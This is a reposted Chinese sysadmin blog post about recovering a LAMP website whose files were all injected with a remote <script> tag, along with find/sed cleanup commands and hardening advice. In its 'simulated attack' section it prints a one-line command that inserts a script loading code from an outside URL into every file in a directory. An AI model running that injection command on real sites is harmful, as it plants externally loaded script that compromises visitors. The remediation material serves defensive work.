企业的网站遭受木马攻击了,导致网站目录下所有文件都被篡改了
生活随笔
收集整理的這篇文章主要介紹了
企业的网站遭受木马攻击了,导致网站目录下所有文件都被篡改了
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
問題:
一個 lamp 的服務器站點目錄下所有文件均被植入如下內容
<script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>包括圖片文件也被植入了,網站打開時就會調用這個地址,造成的影響很惡劣。
實際解決辦法:
思路是:需要遍歷所有目錄有文件 把以上被植入的內容刪除掉。
1、? 先備份數據。然后,執行命令批量修改回來。
2、? a.備份原始出問題的原始文件;?b.歷史備份覆蓋;c.find+sed 替換;
模擬攻擊
find /oldboy/ -type f|xargs sed -i '1 i <script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>'處理方法
[root@test ~]# find /oldboy -type f|xargs sed -i 's# <script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>##g' [root@test ~]find. -type f -exec sed -i ‘s#<script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>##g’ {} \; 這個命令是正確的語法,點號為特殊字符,使用、來轉義(數去特殊字符代表的特殊含義,使用其本身的原始意義)對于本題可以不用轉義2、查看處理結果,詳細查看日志,追蹤問題發生來源。
3、提供亡羊補牢的解決方案(站點目錄嚴格權限規劃方案及新上線發布范圍思路)
?
轉載于:https://www.cnblogs.com/luoahong/p/6198501.html
總結
以上是生活随笔為你收集整理的企业的网站遭受木马攻击了,导致网站目录下所有文件都被篡改了的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: AOJ 6.Hero In Maze
- 下一篇: iOS蓝牙4.0(BLE)-LightB